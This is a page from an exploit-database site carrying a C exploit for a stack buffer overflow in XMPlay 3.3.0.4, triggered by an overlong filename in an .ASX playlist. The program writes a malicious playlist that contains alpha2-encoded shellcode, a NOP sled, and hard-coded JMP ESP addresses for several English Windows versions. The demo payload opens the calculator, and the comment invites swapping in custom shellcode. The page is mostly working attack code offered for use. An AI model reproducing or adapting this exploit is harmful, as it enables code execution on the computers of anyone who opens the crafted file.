0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
XMPlay 3.3.0.4 (ASX Filename) Local Buffer Overflow Exploit
=========================================================== XMPlay 3.3.0.4 (ASX Filename) Local Buffer Overflow Exploit =========================================================== /* =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when loading malformed .ASX files This merely executes CALC.exe but you could always add your own custom shellcode (alpha2) =============== ASX <ASX VERSION="3"> <ENTRY> <REF HREF="file://[EXPLOIT HERE]" </ENTRY> </ASX> =============== Reported Exploit Date: 11/21/2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { FILE *Exploit; char buffer[512]; /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */ unsigned char scode[] = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI" "YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM" "5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp" "LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip" "sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA"; char NOPSled[50]; char tail[] = ".mid\x22\r\n"; int JMP, x; printf("\n======================================================================\n"); printf("XMPlay 3.3.0.4 and prior ASX Filename Buffer Overflow Exploit\n"); printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n"); printf("Usage: %s <output ASX file> <JMP>\n", argv[0]); printf("\n JMP Options\n"); printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n"); printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n"); printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n"); printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>\n"); printf("====================================================================\n\n\n"); if (argc < 2) { printf("Invalid Number Of Arguments\n"); return 1; } Exploit = fopen(argv[1],"w"); if ( !Exploit ) { printf("\nCouldn't Open File!"); return 1; } memset(buffer, 0, 505); memset(NOPSled, 0, 20); fputs("<ASX VERSION=\x22\x33\x22>\r\n<ENTRY>\r\n", Exploit); fputs("<REF HREF=\x22", Exploit); fputs("file://C:\\", Exploit); for (x=0;x<498;x++) { strcat(buffer, "A"); } fputs(buffer, Exploit); if (atoi(argv[2]) <= 0) { JMP = 1; } else if (atoi(argv[2]) > 4) { JMP = 1; } else { JMP = atoi(argv[2]); } switch(JMP) { case 1: printf("Using English Windows XP SP2 JMP...\n"); fputs("\xbc\x41\xdb\x77", Exploit); break; case 2: printf("Using English Windows XP SP1 JMP...\n"); fputs("\xfc\x18\xd7\x77", Exploit); break; case 3: printf("Using English Windows 2003 SP0 & SP1 JMP...\n"); fputs("\xdc\x4a\xd7\x77", Exploit); break; case 4: printf("Using English Windows 2000 SP 4 JMP...\n"); fputs("\x56\xc2\xe3\x77", Exploit); break; } fputs(scode, Exploit); for (x=0;x<20;x++) { strcat(NOPSled, "\x90"); } fputs(NOPSled, Exploit); fputs(tail, Exploit); fputs("</ENTRY>\r\n</ASX>\r\n", Exploit); printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]); printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n"); printf("Greetz to: Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n"); fclose(Exploit); return 0; } # 0day.today [2024-07-07] #